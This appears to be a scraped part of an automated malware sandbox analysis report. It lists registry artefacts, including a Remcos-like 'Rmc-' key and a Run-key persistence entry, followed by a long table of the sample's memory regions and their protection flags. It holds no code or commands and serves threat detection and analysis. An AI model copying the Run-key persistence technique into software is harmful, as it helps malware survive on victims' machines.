HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
time
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Gummicheckene
|
There are 13 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
D545000
|
direct allocation
|
page execute and read and write
|
||
8EE0000
|
direct allocation
|
page execute and read and write
|
||
92F7000
|
heap
|
page read and write
|
||
606C000
|
trusted library allocation
|
page read and write
|
||
1209006F000
|
trusted library allocation
|
page read and write
|
||
788E000
|
stack
|
page read and write
|
||
7AF9000
|
heap
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
5489000
|
trusted library allocation
|
page read and write
|
||
5647000
|
trusted library allocation
|
page read and write
|
||
736E000
|
stack
|
page read and write
|
||
824000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
80A000
|
heap
|
page read and write
|
||
49DD000
|
heap
|
page read and write
|
||
2718F000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
8B9B000
|
trusted library allocation
|
page read and write
|
||
496F000
|
unkown
|
page read and write
|
||
818000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
120F0235000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7620000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
25C3B000
|
heap
|
page read and write
|
||
1A3F8FD000
|
stack
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
4991000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
A345000
|
direct allocation
|
page execute and read and write
|
||
49AC000
|
heap
|
page read and write
|
||
5857000
|
trusted library allocation
|
page read and write
|
||
5794000
|
trusted library allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
4A10000
|
heap
|
page read and write
|
||
2521A000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
2B1F000
|
stack
|
page read and write
|
||
87B7000
|
stack
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
49A7000
|
heap
|
page read and write
|
||
120EE22E000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
26B7B000
|
heap
|
page read and write
|
||
811000
|
heap
|
page read and write
|
||
24BB0000
|
remote allocation
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
25181000
|
heap
|
page read and write
|
||
8945000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
27BE000
|
unkown
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
83E000
|
heap
|
page read and write
|
||
120F0210000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
1209000F000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
814000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page execute and read and write
|
||
50C0000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
120EFBD0000
|
heap
|
page read and write
|
||
25455000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
2613E000
|
heap
|
page read and write
|
||
12090001000
|
trusted library allocation
|
page read and write
|
||
1A3FDFE000
|
stack
|
page read and write
|
||
1208022C000
|
trusted library allocation
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
50BF000
|
stack
|
page read and write
|
||
1A3FA7E000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
12080B84000
|
trusted library allocation
|
page read and write
|
||
9300000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
120815BB000
|
trusted library allocation
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
811000
|
heap
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
8D3C000
|
stack
|
page read and write
|
||
44E000
|
stack
|
page read and write
|
||
795E000
|
stack
|
page read and write
|
||
81A000
|
heap
|
page read and write
|
||
1A3FFFB000
|
stack
|
page read and write
|
||
75FA000
|
stack
|
page read and write
|
||
818000
|
heap
|
page read and write
|
||
49A3000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page readonly
|
||
120F0331000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
560F000
|
trusted library allocation
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
25531000
|
heap
|
page read and write
|
||
56B6000
|
trusted library allocation
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
8F70000
|
direct allocation
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
26BC000
|
stack
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120EE3A5000
|
heap
|
page read and write
|
||
49A4000
|
heap
|
page read and write
|
||
2520A000
|
heap
|
page read and write
|
||
12080B99000
|
trusted library allocation
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page read and write
|
||
780A000
|
stack
|
page read and write
|
||
843000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
120F026C000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
44D8000
|
heap
|
page read and write
|
||
58FD000
|
trusted library allocation
|
page read and write
|
||
828000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
74BD000
|
stack
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
4A19000
|
heap
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
9347000
|
heap
|
page read and write
|
||
7510000
|
direct allocation
|
page read and write
|
||
5709000
|
trusted library allocation
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
12081E00000
|
trusted library allocation
|
page read and write
|
||
1A3FB7D000
|
stack
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
7BF0000
|
heap
|
page execute and read and write
|
||
50C1000
|
heap
|
page read and write
|
||
7E8000
|
heap
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
24BB0000
|
remote allocation
|
page read and write
|
||
2B24000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
251F8000
|
heap
|
page read and write
|
||
7C6E000
|
stack
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
2B3E000
|
stack
|
page read and write
|
||
50C4000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
7FA000
|
heap
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
81A000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
92FA000
|
heap
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
AD45000
|
direct allocation
|
page execute and read and write
|
||
270D000
|
stack
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
2BE3000
|
heap
|
page read and write
|
||
7500000
|
direct allocation
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
12081D7C000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
2B22000
|
stack
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
1208008D000
|
trusted library allocation
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
8992000
|
heap
|
page read and write
|
||
1A3FEFE000
|
stack
|
page read and write
|
||
815000
|
heap
|
page read and write
|
||
8BB0000
|
trusted library allocation
|
page read and write
|
||
120902F8000
|
trusted library allocation
|
page read and write
|
||
562B000
|
trusted library allocation
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
7B06000
|
heap
|
page read and write
|
||
49BA000
|
heap
|
page read and write
|
||
7290000
|
heap
|
page execute and read and write
|
||
2734000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
25225000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
4E80000
|
heap
|
page read and write
|
||
82E000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
120F05B0000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
1A3F97E000
|
stack
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
2D2E000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
120EE330000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
1A3FC77000
|
stack
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
E945000
|
direct allocation
|
page execute and read and write
|
||
2F0E000
|
unkown
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
26B73000
|
heap
|
page read and write
|
||
83F000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
120F059B000
|
heap
|
page read and write
|
||
80B000
|
heap
|
page read and write
|
||
1208164A000
|
trusted library allocation
|
page read and write
|
||
1A3FAFE000
|
stack
|
page read and write
|
||
5483000
|
trusted library allocation
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
75BD000
|
stack
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
819000
|
heap
|
page read and write
|
||
49CA000
|
heap
|
page read and write
|
||
8E8D000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
812000
|
heap
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
4EA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FB000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
26F9000
|
stack
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
12080499000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
2664D000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
835000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
79D1000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
120EFC30000
|
heap
|
page execute and read and write
|
||
8E4E000
|
stack
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
2613B000
|
heap
|
page read and write
|
||
25450000
|
heap
|
page read and write
|
||
823000
|
heap
|
page read and write
|
||
2FD9000
|
stack
|
page read and write
|
||
120F051E000
|
heap
|
page read and write
|
||
8951000
|
heap
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
DF45000
|
direct allocation
|
page execute and read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
83D000
|
heap
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
44DE000
|
stack
|
page read and write
|
||
4995000
|
heap
|
page read and write
|
||
49D3000
|
heap
|
page read and write
|
||
25309000
|
heap
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
5018000
|
trusted library allocation
|
page read and write
|
||
4970000
|
heap
|
page read and write
|
||
1A409CF000
|
stack
|
page read and write
|
||
1208049D000
|
trusted library allocation
|
page read and write
|
||
1208048C000
|
trusted library allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
1A3F536000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
26644000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
120F0480000
|
heap
|
page execute and read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
120EE279000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
251F8000
|
heap
|
page read and write
|
||
120F0519000
|
heap
|
page read and write
|
||
8830000
|
trusted library allocation
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
DDE000
|
stack
|
page read and write
|
||
120F02FB000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
827000
|
heap
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
25181000
|
heap
|
page read and write
|
||
8ED0000
|
trusted library allocation
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
2F9C000
|
stack
|
page read and write
|
||
784E000
|
stack
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
2F19000
|
heap
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
120F0310000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120EFCF0000
|
heap
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
26B75000
|
heap
|
page read and write
|
||
615000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
120EE020000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
49BE000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
12080B6D000
|
trusted library allocation
|
page read and write
|
||
499D000
|
heap
|
page read and write
|
||
26136000
|
heap
|
page read and write
|
||
8CF0000
|
trusted library allocation
|
page read and write
|
||
29CE000
|
unkown
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
827000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
49DD000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
120EFB80000
|
trusted library allocation
|
page read and write
|
||
26132000
|
heap
|
page read and write
|
||
120F05B6000
|
heap
|
page read and write
|
||
C96000
|
heap
|
page read and write
|
||
26647000
|
heap
|
page read and write
|
||
88CE000
|
stack
|
page read and write
|
||
4F22000
|
trusted library allocation
|
page read and write
|
||
57CC000
|
trusted library allocation
|
page read and write
|
||
2F3F000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
49B3000
|
heap
|
page read and write
|
||
49B8000
|
heap
|
page read and write
|
||
49A7000
|
heap
|
page read and write
|
||
120EE350000
|
trusted library allocation
|
page read and write
|
||
2613E000
|
heap
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
7530000
|
direct allocation
|
page read and write
|
||
2D2D000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
2B06000
|
stack
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
4B4F000
|
stack
|
page read and write
|
||
822000
|
heap
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
120EFCF5000
|
heap
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
4990000
|
heap
|
page read and write
|
||
120EE300000
|
trusted library allocation
|
page read and write
|
||
7540000
|
direct allocation
|
page read and write
|
||
4EC1000
|
trusted library allocation
|
page read and write
|
||
799E000
|
stack
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
4911000
|
heap
|
page read and write
|
||
120F0272000
|
heap
|
page read and write
|
||
8840000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
4D84000
|
trusted library allocation
|
page read and write
|
||
7295000
|
heap
|
page execute and read and write
|
||
82E000
|
heap
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
55D8000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
2770000
|
heap
|
page read and write
|
||
81C000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
120F0490000
|
heap
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
120EE25A000
|
heap
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
4D40000
|
heap
|
page read and write
|
||
120F0104000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
25C37000
|
heap
|
page read and write
|
||
3258000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
4DB5000
|
trusted library allocation
|
page execute and read and write
|
||
4990000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
811000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
25181000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
7CEE000
|
stack
|
page read and write
|
||
4A19000
|
heap
|
page read and write
|
||
7AE9000
|
heap
|
page read and write
|
||
120EE340000
|
heap
|
page readonly
|
||
890000
|
heap
|
page read and write
|
||
2BED000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
7E5000
|
heap
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
251F8000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page readonly
|
||
49A6000
|
heap
|
page read and write
|
||
1A40B4B000
|
stack
|
page read and write
|
||
253FC000
|
heap
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
8810000
|
trusted library allocation
|
page execute and read and write
|
||
83A000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
120F0487000
|
heap
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
934E000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
12081F79000
|
trusted library allocation
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
77CE000
|
stack
|
page read and write
|
||
12080BA0000
|
trusted library allocation
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
1A3F87E000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
25D5000
|
stack
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
57B0000
|
trusted library allocation
|
page read and write
|
||
12081D93000
|
trusted library allocation
|
page read and write
|
||
2D2E000
|
heap
|
page read and write
|
||
12080BBB000
|
trusted library allocation
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
2B2E000
|
heap
|
page read and write
|
||
27FE000
|
unkown
|
page read and write
|
||
92F3000
|
heap
|
page read and write
|
||
12081DA1000
|
trusted library allocation
|
page read and write
|
||
8B90000
|
trusted library allocation
|
page read and write
|
||
7E8000
|
heap
|
page read and write
|
||
834000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
81E000
|
heap
|
page read and write
|
||
934D000
|
heap
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
4A4E000
|
stack
|
page read and write
|
||
120F0544000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
120EE100000
|
heap
|
page read and write
|
||
9945000
|
direct allocation
|
page execute and read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
C145000
|
direct allocation
|
page execute and read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
24BB0000
|
remote allocation
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
25C33000
|
heap
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
4A19000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
25C39000
|
heap
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
8E0C000
|
stack
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
120EE284000
|
heap
|
page read and write
|
||
2FDA000
|
heap
|
page read and write
|
||
2664C000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A5000
|
heap
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
4E60000
|
heap
|
page readonly
|
||
540000
|
heap
|
page read and write
|
||
4DAA000
|
trusted library allocation
|
page execute and read and write
|
||
2520B000
|
heap
|
page read and write
|
||
9300000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
stack
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
5725000
|
trusted library allocation
|
page read and write
|
||
12081D81000
|
trusted library allocation
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
2857000
|
heap
|
page read and write
|
||
817000
|
heap
|
page read and write
|
||
2521A000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
58AA000
|
trusted library allocation
|
page read and write
|
||
2873000
|
heap
|
page read and write
|
||
81F000
|
heap
|
page read and write
|
||
2F17000
|
heap
|
page read and write
|
||
2543B000
|
heap
|
page read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
8D7B000
|
stack
|
page read and write
|
||
120F00F0000
|
heap
|
page execute and read and write
|
||
50C3000
|
heap
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
25225000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
4911000
|
heap
|
page read and write
|
||
259C000
|
stack
|
page read and write
|
||
120902E9000
|
trusted library allocation
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
26B70000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
120EFCF7000
|
heap
|
page read and write
|
||
8B8D000
|
stack
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
2B0A000
|
heap
|
page read and write
|
||
7550000
|
direct allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
B745000
|
direct allocation
|
page execute and read and write
|
||
48F000
|
stack
|
page read and write
|
||
3305000
|
heap
|
page read and write
|
||
1A40ACA000
|
stack
|
page read and write
|
||
2B94000
|
heap
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
1A3F9FB000
|
stack
|
page read and write
|
||
4A1D000
|
heap
|
page read and write
|
||
25560000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
1A3F5BE000
|
stack
|
page read and write
|
||
120F027A000
|
heap
|
page read and write
|
||
5EC1000
|
trusted library allocation
|
page read and write
|
||
8955000
|
heap
|
page read and write
|
||
7520000
|
direct allocation
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
12081DA5000
|
trusted library allocation
|
page read and write
|
||
6053000
|
trusted library allocation
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
842000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
25455000
|
heap
|
page read and write
|
||
25450000
|
heap
|
page read and write
|
||
7AE0000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
4D20000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
355F000
|
stack
|
page read and write
|
||
8EB0000
|
trusted library allocation
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
8F10000
|
direct allocation
|
page read and write
|
||
120EE1C0000
|
heap
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
26132000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
12081DB7000
|
trusted library allocation
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
36FB000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
581F000
|
trusted library allocation
|
page read and write
|
||
120EE280000
|
heap
|
page read and write
|
||
120F04C9000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
567E000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120EFB50000
|
trusted library allocation
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2B93000
|
heap
|
page read and write
|
||
2E3F000
|
unkown
|
page read and write
|
||
2549D000
|
heap
|
page read and write
|
||
120F02B9000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
253FC000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
50C8000
|
heap
|
page read and write
|
||
9354000
|
heap
|
page read and write
|
||
5F27000
|
trusted library allocation
|
page read and write
|
||
588E000
|
trusted library allocation
|
page read and write
|
||
828000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
88F0000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
120EFC90000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
5EE9000
|
trusted library allocation
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
897F000
|
heap
|
page read and write
|
||
4998000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
56D2000
|
trusted library allocation
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
49A4000
|
heap
|
page read and write
|
||
7B20000
|
heap
|
page read and write
|
||
4ADF000
|
stack
|
page read and write
|
||
12090021000
|
trusted library allocation
|
page read and write
|
||
8F60000
|
trusted library allocation
|
page execute and read and write
|
||
8938000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
4FB000
|
stack
